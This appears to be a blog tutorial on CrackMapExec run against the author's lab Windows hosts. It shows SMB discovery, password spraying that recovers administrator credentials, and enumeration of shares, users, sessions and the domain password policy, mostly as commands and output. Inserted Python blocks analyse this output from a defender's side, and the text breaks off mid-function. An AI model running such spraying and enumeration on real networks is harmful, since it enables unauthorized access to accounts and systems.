Thursday, May 2, 2019

Having Fun with CrackMapExec

In this post, we will be learning a bit about the tool CrackMapExec. This tool is not installed by default on Kali and thus we need to install it.

root@securitynik:# apt-get install crackmapexec


Now that it is installed, we can start by looking at the help.
root@securitynik:/cme# crackmapexec --help 
usage: crackmapexec [-h] [-v] [-t THREADS] [-id CRED_ID [CRED_ID ...]]
                    [-u USERNAME [USERNAME ...]] [-d DOMAIN | --local-auth]
                    [-p PASSWORD [PASSWORD ...] | -H HASH [HASH ...]]
                    [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L]
                    [--show-options] [--share SHARE] [--smb-port {139,445}]
                    [--mssql-port PORT] [--server {http,https}]
                    [--server-host HOST] [--server-port PORT]
                    [--timeout TIMEOUT]
                    [--gfail-limit LIMIT | --ufail-limit LIMIT | --fail-limit LIMIT]
                    [--verbose] [--sam] [--lsa] [--ntds {vss,drsuapi}]
                    [--ntds-history] [--ntds-pwdLastSet]
                    [--wdigest {enable,disable}] [--shares] [--uac]
                    [--sessions] [--disks] [--users] [--rid-brute [MAX_RID]]
                    [--pass-pol] [--lusers] [--wmi QUERY]
                    [--wmi-namespace NAMESPACE] [--spider [FOLDER]]
                    [--content] [--exclude-dirs DIR_LIST]
                    [--pattern PATTERN [PATTERN ...] | --regex REGEX
                    [REGEX ...]] [--depth DEPTH]
                    [--exec-method {smbexec,wmiexec,atexec}] [--force-ps32]
                    [--no-output] [-x COMMAND | -X PS_COMMAND] [--mssql]
                    [--mssql-query QUERY] [--mssql-auth {windows,normal}]
                    [target [target ...]]

.... <truncated for brevity> ....

Now that we have the help, let's see what we can learn about the remote hosts within our subnet. Without any credentials, we are able to see the following:

root@securitynik:/cme# crackmapexec 10.0.0.100/24
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
[*] KTHXBYE!

From above, we see that without any credentials, we were able to identify 3 hosts on the 10.0.0.0/24 subnet. Let's now add those hosts to a file which we can use in the future.


root@securitynik:/cme# echo 10.0.0.103 >> cme-hosts.txt
root@securitynik:/cme# echo 10.0.0.3 >> cme-hosts.txt
root@securitynik:/cme# echo 10.0.0.105 >> cme-hosts.txt
root@securitynik:/cme# crackmapexec cme-hosts.txt 
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
[*] KTHXBYE!


Now that we have a file consisting of the hosts, let's see what else we can figure out. First let's try to enumerate the shares:


root@securitynik:/# crackmapexec cme-hosts.txt --shares
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
[*] KTHXBYE!

The above does not look any different from what we had previously. Let's see what happens if we add some usernames and passwords to files.

Let's add the usernames to the text file first.

root@securitynik:/cme# echo administrator >> username.txt
root@securitynik:/cme# echo nakia >> username.txt
root@securitynik:/cme# echo neysa >> username.txt
root@securitynik:/cme# echo securitynik >> username.txt
root@securitynik:/cme# echo saadia >> username.txt


Now let's add the passwords to a file.

root@securitynik:/cme# echo password >> password.txt
root@securitynik:/cme# echo password >> password.txt
root@securitynik:/cme# echo GuessMe >> password.txt 
root@securitynik:/cme# echo Testing1 >> password.txt 

Let's try a password spraying attack to see if one of the passwords in the "password.txt" file works for one or more of the usernames in the "username.txt" file. At the same time, let's enumerate the shares on any host we are able to successfully authenticate against.

root@securitynik:/cme# crackmapexec cme-hosts.txt -u username.txt -p password.txt --shares
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:Yahooecho password STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:GuessMe STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:Yahooecho password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:GuessMe STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\securitynik:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:Yahooecho password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:password STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:GuessMe STATUS_LOGON_FAILURE 
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\saadia:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:Yahooecho password STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:GuessMe STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\neysa:Testing1 
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating shares
CME          10.0.0.103:445 SECURITYNIK-WIN SHARE           Permissions
CME          10.0.0.103:445 SECURITYNIK-WIN -----           -----------
CME          10.0.0.103:445 SECURITYNIK-WIN ShareFolder     READ, WRITE
CME          10.0.0.103:445 SECURITYNIK-WIN ADMIN$          READ, WRITE
CME          10.0.0.103:445 SECURITYNIK-WIN IPC$            READ
CME          10.0.0.103:445 SECURITYNIK-WIN C$              READ, WRITE
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating shares
CME          10.0.0.105:445 SECNIK-2K19     SHARE           Permissions
CME          10.0.0.105:445 SECNIK-2K19     -----           -----------
CME          10.0.0.105:445 SECNIK-2K19     NETLOGON        READ
CME          10.0.0.105:445 SECNIK-2K19     SYSVOL          READ
CME          10.0.0.105:445 SECNIK-2K19     ADMIN$          NO ACCESS
CME          10.0.0.105:445 SECNIK-2K19     IPC$            READ
CME          10.0.0.105:445 SECNIK-2K19     C$              NO ACCESS
[*] KTHXBYE!


From above, we see the different passwords were tried and ultimately we were successful using password "Testing1" with username "administrator" on host "SECURITYNIK-WIN". From the "(Pwn3d!)" above, we can say this system is owned. Think admin privileges.

At the same time, we see we were also able to determine the credentials for "neysa" as "Testing1" on the host "SECNIK-2K19".

Now that we know we have credentials that work, let's focus on using "administrator" and "Testing1" for the rest of our activities.
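The lines above are easier to act on once they are structured. What follows is an added example, not code from this post or from CrackMapExec: a small parser for the CME SMB output format shown above (banner lines, `[-]`/`[+]` authentication results and the share table), followed by two defender-side summaries of the same run: which hosts are domain-joined (name differs from domain), whether a host saw the spray pattern (one password tried against several accounts, the same signal a SOC would look for in failed-logon events), and which shares came back writable. The sample input is a constructed, trimmed copy of the output above; the `min_users` threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the CrackMapExec SMB output shown in this post
# (lab addresses, host names and credentials are the post's own; rows were trimmed).
SAMPLE_CME_OUTPUT = r"""
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:password STATUS_LOGON_FAILURE
CME          10.0.0.103:445 SECURITYNIK-WIN [-] SECURITYNIK-WIN\administrator:GuessMe STATUS_LOGON_FAILURE
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\neysa:password STATUS_LOGON_FAILURE
CME          10.0.0.105:445 SECNIK-2K19     [-] SECURITYNIK\nakia:password STATUS_LOGON_FAILURE
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\neysa:Testing1
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating shares
CME          10.0.0.103:445 SECURITYNIK-WIN SHARE           Permissions
CME          10.0.0.103:445 SECURITYNIK-WIN -----           -----------
CME          10.0.0.103:445 SECURITYNIK-WIN ShareFolder     READ, WRITE
CME          10.0.0.103:445 SECURITYNIK-WIN ADMIN$          READ, WRITE
CME          10.0.0.103:445 SECURITYNIK-WIN IPC$            READ
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating shares
CME          10.0.0.105:445 SECNIK-2K19     SHARE           Permissions
CME          10.0.0.105:445 SECNIK-2K19     -----           -----------
CME          10.0.0.105:445 SECNIK-2K19     NETLOGON        READ
CME          10.0.0.105:445 SECNIK-2K19     ADMIN$          NO ACCESS
[*] KTHXBYE!
"""

LINE_RE = re.compile(r"^CME\s+(?P<ip>[\d.]+):(?P<port>\d+)\s+(?P<name>\S+)\s+(?P<rest>.*)$")
BANNER_RE = re.compile(r"^\[\*\] (?P<os>.+?) \(name:(?P<name>[^)]+)\) \(domain:(?P<domain>[^)]+)\)$")
AUTH_RE = re.compile(r"^\[(?P<result>[+-])\] (?P<domain>[^\\\s]+)\\(?P<user>[^:]+):(?P<tail>.*)$")
SHARE_RE = re.compile(r"^(?P<share>\S+)\s{2,}(?P<perm>.+?)\s*$")


def parse_cme_output(text):
    """Turn CME's interleaved per-host lines into hosts, auth attempts and share permissions."""
    hosts, auth, shares = {}, [], defaultdict(dict)
    in_shares = set()  # hosts whose share table is currently being printed
    for raw in text.splitlines():
        m = LINE_RE.match(raw.rstrip())
        if not m:
            continue  # e.g. the closing "[*] KTHXBYE!"
        ip, rest = m["ip"], m["rest"].strip()
        b = BANNER_RE.match(rest)
        if b:  # a standalone host reports its own name as its domain
            hosts[ip] = {"name": b["name"], "os": b["os"], "domain": b["domain"],
                         "domain_joined": b["name"] != b["domain"]}
            continue
        a = AUTH_RE.match(rest)
        if a:
            in_shares.discard(ip)
            tail, admin = a["tail"].strip(), a["tail"].strip().endswith("(Pwn3d!)")
            if admin:
                tail = tail[: -len("(Pwn3d!)")].rstrip()
            status = None
            if a["result"] == "-":  # password may contain spaces; the status is the last token
                tail, _, status = tail.rpartition(" ")
            auth.append({"ip": ip, "host": m["name"], "domain": a["domain"], "user": a["user"],
                         "password": tail, "success": a["result"] == "+", "admin": admin, "status": status})
            continue
        if rest == "[+] Enumerating shares":
            in_shares.add(ip)
            continue
        if rest.startswith("["):  # any other status line ends that host's share table
            in_shares.discard(ip)
            continue
        s = SHARE_RE.match(rest)
        if ip in in_shares and s and s["share"] not in ("SHARE", "-----"):
            perm = s["perm"]
            shares[ip][s["share"]] = set() if perm == "NO ACCESS" else {p.strip() for p in perm.split(",")}
    return {"hosts": hosts, "auth": auth, "shares": dict(shares)}


def spray_summary(report, min_users=2):
    """Per host: attempts, accounts, successes, and whether one password hit >= min_users accounts."""
    per_host = defaultdict(lambda: {"attempts": 0, "users": set(), "passwords": set(),
                                    "successes": [], "spray": False})
    users_by_password = defaultdict(lambda: defaultdict(set))
    for a in report["auth"]:
        h = per_host[a["ip"]]
        h["attempts"] += 1
        h["users"].add(a["user"])
        h["passwords"].add(a["password"])
        users_by_password[a["ip"]][a["password"]].add(a["user"])
        if a["success"]:
            h["successes"].append((a["user"], a["admin"]))
    for ip, by_pw in users_by_password.items():
        per_host[ip]["spray"] = any(len(users) >= min_users for users in by_pw.values())
    return dict(per_host)


def writable_shares(report):
    """(ip, share) pairs where the authenticated account had WRITE permission."""
    return sorted((ip, share) for ip, table in report["shares"].items()
                  for share, perms in table.items() if "WRITE" in perms)


if __name__ == "__main__":
    report = parse_cme_output(SAMPLE_CME_OUTPUT)
    for ip, host in report["hosts"].items():
        print(ip, host["name"], "domain-joined" if host["domain_joined"] else "standalone")
    for ip, summary in spray_summary(report).items():
        print(ip, "spray pattern" if summary["spray"] else "single-account guessing", summary["successes"])
    print("writable:", writable_shares(report))
```

The `domain_joined` flag comes straight from the banner: SECURITYNIK-WIN reports its own name as its domain, while SECNIK-2K19 reports SECURITYNIK, which is the first hint of where the domain controller is. The `spray` flag is what distinguishes the post's run against the domain from ordinary single-account guessing: the same password against several accounts.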

Let's continue enumerating the hosts.

Let's first start by testing whether or not User Account Control (UAC) is enabled.


root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --uac
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating UAC status
CME          10.0.0.105:445 SECNIK-2K19     1 - UAC Enabled
.... <error occurred here> ...
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating UAC status
CME          10.0.0.103:445 SECURITYNIK-WIN 1 - UAC Enabled
[*] KTHXBYE!


From above, we see UAC is enabled on hosts "10.0.0.105:445 SECNIK-2K19" and "10.0.0.103:445 SECURITYNIK-WIN".

Let's continue enumerating. This time let's enumerate the disks on the hosts.


root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --disks
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating disks
CME          10.0.0.103:445 SECURITYNIK-WIN C:
CME          10.0.0.103:445 SECURITYNIK-WIN D:
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating disks
CME          10.0.0.105:445 SECNIK-2K19     C:
CME          10.0.0.105:445 SECNIK-2K19     D:
[*] KTHXBYE!

From above, we see that both "10.0.0.103:445 SECURITYNIK-WIN" and "10.0.0.105:445 SECNIK-2K19" are reporting that they have both a "C:" and a "D:" drive.

We are also able to enumerate existing sessions on the hosts as shown below:


root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --sessions
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Enumerating active sessions
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating active sessions
[*] KTHXBYE!

Let's now enumerate the users on the systems:


root@securitynik:/cme# crackmapexec cme-hosts.txt -u administrator -p Testing1 --users
CME          10.0.0.3:445 SECURITYNIK-SYS [*] Windows 10.0 Build 17763 (name:SECURITYNIK-SYS) (domain:SECURITYNIK-SYS)
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.103:445 SECURITYNIK-WIN [*] Windows 10.0 Build 16299 (name:SECURITYNIK-WIN) (domain:SECURITYNIK-WIN)
CME          10.0.0.3:445 SECURITYNIK-SYS [-] SECURITYNIK-SYS\administrator:Testing1 STATUS_LOGON_FAILURE 
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] SECURITYNIK-WIN\administrator:Testing1 (Pwn3d!)
CME          10.0.0.103:445 SECURITYNIK-WIN [+] Dumping users
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN Administrator (500)/LogonCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN DefaultAccount (503)/LogonCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN Guest (501)/LogonCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN nikTest (1003)/LogonCount: 7
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN SecurityNik (1002)/LogonCount: 83
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/FullName: 
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/UserComment: 
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/PrimaryGroupId: 513
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/BadPasswordCount: 0
CME          10.0.0.103:445 SECURITYNIK-WIN WDAGUtilityAccount (504)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping users
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/FullName: 
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     Administrator (500)/LogonCount: 33
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/FullName: 
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/PrimaryGroupId: 514
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     Guest (501)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/FullName: 
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     krbtgt (502)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/FullName: nakia
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     nakia (1103)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/FullName: neysa
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     neysa (1104)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/FullName: securitynik
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     securitynik (1105)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/FullName: saadia
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     saadia (1106)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/FullName: nik
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     nik (1107)/LogonCount: 0
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/FullName: 
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/UserComment: 
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/PrimaryGroupId: 513
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/BadPasswordCount: 0
CME          10.0.0.105:445 SECNIK-2K19     Prague (1110)/LogonCount: 0

From above, we can conclude that the device at "10.0.0.105:445 SECNIK-2K19" is more than likely an Active Directory domain controller. Now that we know what this device is, let's enumerate the domain policy:


root@securitynik:/cme# crackmapexec 10.0.0.105 --pass-pol -u administrator -p Testing1
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping password policy
CME          10.0.0.105:445 SECNIK-2K19     Minimum password length: 7
CME          10.0.0.105:445 SECNIK-2K19     Password history length: 24
CME          10.0.0.105:445 SECNIK-2K19     Maximum password age: 41 days 23 hours 52 minutes
CME          10.0.0.105:445 SECNIK-2K19     Minimum password age: 23 hours 52 minutes
CME          10.0.0.105:445 SECNIK-2K19     Account lockout threshold: 0
CME          10.0.0.105:445 SECNIK-2K19     Account lockout duration: None
[*] KTHXBYE!

From above, an attacker now has tremendous visibility into the users in the domain as well as information on the password policy to mount an effective password-based attack. Realistically, we already have the administrator credentials. However, the information above is still helpful.
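The detail in that policy dump that matters most for the spraying shown earlier is "Account lockout threshold: 0": with no lockout, failed guesses are never throttled. As an added example (not code from the post or from CrackMapExec), here is a small evaluator that parses the `--pass-pol` output into numbers, converting the "41 days 23 hours 52 minutes" style durations to minutes, and compares them against a hardening baseline. The sample is a constructed copy of the output above; the baseline values (minimum length 14, history 24, lockout after at most 10 failures for at least 15 minutes) are assumptions, not anything the post states, and should be replaced with your own standard.

```python
import re

# Constructed sample, copied in shape from the post's --pass-pol run against the domain controller.
PASS_POL_SAMPLE = """
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping password policy
CME          10.0.0.105:445 SECNIK-2K19     Minimum password length: 7
CME          10.0.0.105:445 SECNIK-2K19     Password history length: 24
CME          10.0.0.105:445 SECNIK-2K19     Maximum password age: 41 days 23 hours 52 minutes
CME          10.0.0.105:445 SECNIK-2K19     Minimum password age: 23 hours 52 minutes
CME          10.0.0.105:445 SECNIK-2K19     Account lockout threshold: 0
CME          10.0.0.105:445 SECNIK-2K19     Account lockout duration: None
[*] KTHXBYE!
"""

CME_PREFIX_RE = re.compile(r"^CME\s+\S+:\d+\s+\S+\s*(?P<rest>.*)$")
DURATION_RE = re.compile(r"(\d+)\s*(day|hour|minute)s?")
UNIT_MINUTES = {"day": 1440, "hour": 60, "minute": 1}

# Assumed hardening baseline (not from the post); adjust to your own standard.
BASELINE = {"min_length": 14, "history": 24, "lockout_threshold_max": 10, "lockout_duration_min": 15}


def duration_to_minutes(text):
    """'41 days 23 hours 52 minutes' -> 60472; 'None' (nothing configured) -> None."""
    parts = DURATION_RE.findall(text)
    if not parts:
        return None
    return sum(int(n) * UNIT_MINUTES[unit] for n, unit in parts)


def parse_password_policy(text):
    """Strip the CME prefix and read the 'Key: value' lines into typed fields."""
    fields = {}
    for raw in text.splitlines():
        m = CME_PREFIX_RE.match(raw.rstrip())
        if not m or m["rest"].startswith("[") or ": " not in m["rest"]:
            continue  # non-CME line, status line, or not a key/value pair
        key, value = m["rest"].split(": ", 1)
        fields[key.strip()] = value.strip()
    return {
        "min_length": int(fields["Minimum password length"]),
        "history": int(fields["Password history length"]),
        "max_age_minutes": duration_to_minutes(fields["Maximum password age"]),
        "min_age_minutes": duration_to_minutes(fields["Minimum password age"]),
        "lockout_threshold": int(fields["Account lockout threshold"]),
        "lockout_duration_minutes": duration_to_minutes(fields["Account lockout duration"]),
    }


def evaluate_policy(policy, baseline=BASELINE):
    """Return (field, message) findings where the policy falls short of the baseline."""
    findings = []
    if policy["min_length"] < baseline["min_length"]:
        findings.append(("min_length",
                         f"minimum length {policy['min_length']} is below {baseline['min_length']}"))
    if policy["history"] < baseline["history"]:
        findings.append(("history", f"history {policy['history']} is below {baseline['history']}"))
    if policy["lockout_threshold"] == 0:
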